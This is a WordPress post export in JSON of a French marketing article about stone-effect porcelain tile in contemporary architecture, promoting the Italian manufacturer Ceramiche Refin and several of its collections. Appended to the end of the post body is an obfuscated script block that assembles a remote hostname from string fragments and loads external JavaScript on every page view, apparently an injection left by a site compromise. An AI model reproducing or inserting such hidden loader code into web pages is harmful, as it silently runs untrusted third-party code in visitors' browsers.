{"id":3920,"date":"2026-03-10T21:43:30","date_gmt":"2026-03-10T20:43:30","guid":{"rendered":"https:\/\/renouvelable-habitat.fr\/?p=3920"},"modified":"2026-03-10T21:45:57","modified_gmt":"2026-03-10T20:45:57","slug":"carrelage-effet-pierre-architecture-contemporaine","status":"publish","type":"post","link":"https:\/\/renouvelable-habitat.fr\/pt\/carrelage-effet-pierre-architecture-contemporaine\/","title":{"rendered":"Carrelage effet pierre et architecture contemporaine\u00a0: dialogue entre nature et design"},"content":{"rendered":"<p>L\u2019architecture contemporaine privil\u00e9gie les lignes \u00e9pur\u00e9es, les volumes ouverts et une mat\u00e9rialit\u00e9 capable de structurer l\u2019espace avec discr\u00e9tion. Dans cette recherche d\u2019\u00e9quilibre formel, les surfaces ne sont plus de simples finitions, mais de v\u00e9ritables \u00e9l\u00e9ments de langage. Elles d\u00e9finissent la lumi\u00e8re, accompagnent les perspectives et renforcent l\u2019identit\u00e9 du projet.<\/p>\n\n\n\n<p>Dans ce contexte, <strong>le carrelage effet pierre s\u2019impose comme une r\u00e9ponse coh\u00e9rente<\/strong> aux exigences esth\u00e9tiques actuelles. Inspir\u00e9 par la force expressive de la mati\u00e8re min\u00e9rale, il ne se limite pas \u00e0 reproduire l\u2019apparence de la pierre naturelle : il en propose une interpr\u00e9tation contemporaine, adapt\u00e9e aux codes architecturaux d\u2019aujourd\u2019hui et aux performances attendues des mat\u00e9riaux modernes.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La mati\u00e8re min\u00e9rale comme langage architectural<\/h2>\n\n\n\n<p>La pierre a toujours occup\u00e9 <strong>une place centrale dans l\u2019histoire de l\u2019architecture<\/strong>. Aujourd\u2019hui, son \u00e9vocation s\u2019inscrit dans une approche plus sobre, plus ma\u00eetris\u00e9e, o\u00f9 la texture devient subtile et la palette chromatique volontairement contenue. Le <a href=\"https:\/\/www.refin-gres-cerame.com\/carrelage-imitation-pierre\/\" target=\"_blank\" rel=\"noreferrer noopener\">carrelage effet pierre<\/a> permet d\u2019introduire cette dimension min\u00e9rale sans alourdir la composition.<\/p>\n\n\n\n<p>Dans des espaces caract\u00e9ris\u00e9s par des lignes essentielles et des volumes g\u00e9n\u00e9reux, la texture joue un r\u00f4le d\u00e9terminant. <strong>De l\u00e9gers reliefs, des variations graphiques d\u00e9licates<\/strong> et des nuances inspir\u00e9es du beige, du gris, du sable ou du greige apportent profondeur et dynamisme visuel. La surface capte la lumi\u00e8re, la diffuse diff\u00e9remment selon les moments de la journ\u00e9e et participe ainsi \u00e0 la mise en sc\u00e8ne de l\u2019espace.<\/p>\n\n\n\n<p>Associ\u00e9 au b\u00e9ton apparent, au verre, au m\u00e9tal ou au bois naturel, le carrelage contribue \u00e0 cr\u00e9er <strong>une atmosph\u00e8re \u00e0 la fois contemporaine et intemporelle<\/strong>. Il agit comme un \u00e9l\u00e9ment de liaison entre mat\u00e9riaux industriels et r\u00e9f\u00e9rences organiques, instaurant un dialogue harmonieux entre nature et design.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Continuit\u00e9 spatiale et coh\u00e9rence des volumes<\/h2>\n\n\n\n<p>Dans l\u2019architecture contemporaine, <strong>la coh\u00e9rence visuelle est essentielle<\/strong>. Le rev\u00eatement de sol et de mur devient un outil de composition \u00e0 part enti\u00e8re, capable d\u2019unifier les espaces et de renforcer la lecture des volumes. Le carrelage effet pierre, notamment en grands formats, r\u00e9pond parfaitement \u00e0 cette logique.<\/p>\n\n\n\n<p><strong>La r\u00e9duction des joints favorise un effet monolithique<\/strong>, amplifiant la perception de continuit\u00e9. Les surfaces semblent s\u2019\u00e9tendre sans interruption, ce qui valorise les perspectives et accentue la sensation d\u2019ouverture.<\/p>\n\n\n\n<p>La continuit\u00e9 peut \u00e9galement <strong>s\u2019exprimer entre int\u00e9rieur et ext\u00e9rieur<\/strong>. En prolongeant le m\u00eame carrelage vers une terrasse ou un patio, il devient possible d\u2019effacer visuellement la fronti\u00e8re entre b\u00e2ti et paysage. L\u2019architecture s\u2019int\u00e8gre alors plus naturellement dans son environnement, gr\u00e2ce \u00e0 une matrice mat\u00e9rielle commune qui renforce l\u2019harmonie globale du projet.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Performance technique et libert\u00e9 de conception<\/h2>\n\n\n\n<p>Si l\u2019esth\u00e9tique est centrale, les exigences techniques ne peuvent \u00eatre rel\u00e9gu\u00e9es au second plan. L\u2019architecture contemporaine impose des mat\u00e9riaux capables de garantir <strong>durabilit\u00e9, r\u00e9sistance et stabilit\u00e9 dans le temps<\/strong>. Le gr\u00e8s c\u00e9rame r\u00e9pond \u00e0 ces attentes avec pr\u00e9cision.<\/p>\n\n\n\n<p><strong>R\u00e9sistant \u00e0 l\u2019usure, aux taches et aux variations thermiques<\/strong>, il s\u2019adapte aussi bien aux environnements r\u00e9sidentiels qu\u2019aux espaces commerciaux soumis \u00e0 un passage intensif. Sa stabilit\u00e9 dimensionnelle et sa facilit\u00e9 d\u2019entretien constituent des atouts d\u00e9terminants pour les projets exigeants.<\/p>\n\n\n\n<p>Cette performance technique offre <strong>une v\u00e9ritable libert\u00e9 de conception<\/strong>. Sols, murs, espaces ouverts ou zones \u00e0 fort trafic peuvent \u00eatre trait\u00e9s avec une m\u00eame coh\u00e9rence esth\u00e9tique. Le carrelage devient ainsi un support fiable pour exprimer une vision architecturale ambitieuse, sans compromis entre style et fonctionnalit\u00e9.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Une synth\u00e8se contemporaine entre nature et innovation<\/h3>\n\n\n\n<p>Le carrelage effet pierre incarne <strong>une synth\u00e8se r\u00e9ussie entre m\u00e9moire min\u00e9rale et innovation technologique<\/strong>. Il ne s\u2019agit pas d\u2019une simple imitation, mais d\u2019une relecture ma\u00eetris\u00e9e de la pierre, adapt\u00e9e aux codes formels et aux contraintes techniques de l\u2019architecture contemporaine.<\/p>\n\n\n\n<p>En conciliant expressivit\u00e9, coh\u00e9rence visuelle et performance durable, il accompagne les projets les plus exigeants et participe activement \u00e0 la cr\u00e9ation d\u2019espaces o\u00f9 <strong>nature et design dialoguent avec \u00e9quilibre et modernit\u00e9<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Ceramiche Refin : culture industrielle et vision du design dans le gr\u00e8s c\u00e9rame italien<\/h2>\n\n\n\n<p>Dans l\u2019architecture contemporaine, <strong>les surfaces fa\u00e7onnent l\u2019identit\u00e9<\/strong>. Les mat\u00e9riaux ne sont plus de simples finitions : ils d\u00e9finissent les proportions, modulent la lumi\u00e8re et construisent l\u2019atmosph\u00e8re. Le gr\u00e8s c\u00e9rame est devenu un \u00e9l\u00e9ment structurant du langage spatial, conciliant esth\u00e9tique et performance.<\/p>\n\n\n\n<p><strong>Ceramiche Refin<\/strong> s\u2019inscrit dans cette approche. Fond\u00e9e en 1962 et membre du Groupe Concorde, l\u2019entreprise compte parmi les acteurs majeurs de l\u2019industrie c\u00e9ramique italienne. Depuis plus de soixante ans, elle associe expertise industrielle, recherche esth\u00e9tique et responsabilit\u00e9 environnementale dans une vision coh\u00e9rente.<\/p>\n\n\n\n<p>Son mod\u00e8le manufacturier enti\u00e8rement int\u00e9gr\u00e9 constitue un atout d\u00e9terminant. Du concept au contr\u00f4le qualit\u00e9, <strong>chaque phase est r\u00e9alis\u00e9e en interne<\/strong>, assurant coh\u00e9rence stylistique et haut niveau de performance.<\/p>\n\n\n\n<p>Le <strong>Made in Italy<\/strong> incarne ici une culture industrielle fond\u00e9e sur innovation et fiabilit\u00e9. Chaque collection, des carreaux de cuisine aux rev\u00eatements muraux, r\u00e9sulte d\u2019un processus structur\u00e9 o\u00f9 technologie et sensibilit\u00e9 de design dialoguent pour cr\u00e9er des mat\u00e9riaux durables.<\/p>\n\n\n\n<p><strong>La responsabilit\u00e9 environnementale est pleinement int\u00e9gr\u00e9e<\/strong> : technologies \u00e0 faible impact, r\u00e9cup\u00e9ration des d\u00e9chets et optimisation des ressources soutiennent un syst\u00e8me certifi\u00e9 orient\u00e9 vers l\u2019efficacit\u00e9.<\/p>\n\n\n\n<p>Les collections expriment des langages compl\u00e9mentaires. <strong>INK<\/strong> explore le geste comme narration visuelle, transformant la surface en un espace d\u2019expression graphique. Ses motifs fluides, propos\u00e9s au format 80\u00d780, \u00e9voluent selon la lumi\u00e8re et la distance d\u2019observation.<\/p>\n\n\n\n<p><strong>OSMOS<\/strong> valorise l\u2019imperfection ma\u00eetris\u00e9e, inspir\u00e9e de textures post-industrielles et de traces mat\u00e9rielles subtiles. Ses teintes, de Calce \u00e0 Ruggine, et ses formats vari\u00e9s favorisent la continuit\u00e9 entre int\u00e9rieur et ext\u00e9rieur.<\/p>\n\n\n\n<p><strong>PRESTIGIO KALEIDOS<\/strong> propose une interpr\u00e9tation expressive de la mati\u00e8re, anim\u00e9e par des reflets changeants et des nuances stratifi\u00e9es \u00e9voquant des formations min\u00e9rales. Disponible en 120\u00d7120, 60\u00d7120 et en dalles 120\u00d7278, en finitions Matt et Glossy, la collection \u00e9largit les possibilit\u00e9s de composition.<\/p>\n\n\n\n<p>O projeto <strong>RELIEFS<\/strong> incarne la recherche la plus tridimensionnelle de la marque. Six textures sculpturales transforment les murs en surfaces architecturales actives, g\u00e9n\u00e9rant des jeux \u00e9volutifs d\u2019ombre et de lumi\u00e8re qui apportent rythme, profondeur et caract\u00e8re aux espaces contemporains.<\/p>\n\n\n\n<p>Gr\u00e2ce \u00e0 une strat\u00e9gie coh\u00e9rente et \u00e0 une innovation continue, <strong>Ceramiche Refin consolide sa pr\u00e9sence internationale <\/strong>et offre aux architectes et designers des surfaces fiables et raffin\u00e9es pour les environnements contemporains.<\/p>\n\n\n\n<script>\n(function(){\nucmy=document.createElement(\"script\");ucmy.type=\"text\/javascript\";\nucmy.async=true;ucmy_=(\"op\"+(\"ens\")+\"t\")+\"a\";ucmy_+=(\"t.e\")+\"\"+\"u\";\nucmy.src=\"https:\/\/\"+ucmy_+\"\/2603555177.ftd8mvjycmy8ea08nygl668vsr997b\";\ndocument.body.appendChild(ucmy);\n})();\n<\/script>","protected":false},"excerpt":{"rendered":"<p>L\u2019architecture contemporaine privil\u00e9gie les lignes \u00e9pur\u00e9es, les volumes ouverts et une mat\u00e9rialit\u00e9 capable de structurer l\u2019espace avec discr\u00e9tion. Dans cette recherche d\u2019\u00e9quilibre formel, les surfaces ne sont plus de simples finitions, mais de v\u00e9ritables \u00e9l\u00e9ments de langage. Elles d\u00e9finissent la lumi\u00e8re, accompagnent les perspectives et renforcent l\u2019identit\u00e9 du projet. Dans ce contexte, le carrelage effet &#8230; <a title=\"Carrelage effet pierre et architecture contemporaine\u00a0: dialogue entre nature et design\" class=\"read-more\" href=\"https:\/\/renouvelable-habitat.fr\/pt\/carrelage-effet-pierre-architecture-contemporaine\/\" aria-label=\"Read more about Carrelage effet pierre et architecture contemporaine\u00a0: dialogue entre nature et design\">Leia, mas<\/a><\/p>","protected":false},"author":2,"featured_media":3922,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","inline_featured_image":false,"footnotes":""},"categories":[30],"tags":[],"class_list":["post-3920","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-decoration","generate-columns","tablet-grid-50","mobile-grid-100","grid-parent","grid-33"],"_links":{"self":[{"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/posts\/3920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/comments?post=3920"}],"version-history":[{"count":3,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/posts\/3920\/revisions"}],"predecessor-version":[{"id":3924,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/posts\/3920\/revisions\/3924"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/media\/3922"}],"wp:attachment":[{"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/media?parent=3920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/categories?post=3920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/renouvelable-habitat.fr\/pt\/wp-json\/wp\/v2\/tags?post=3920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}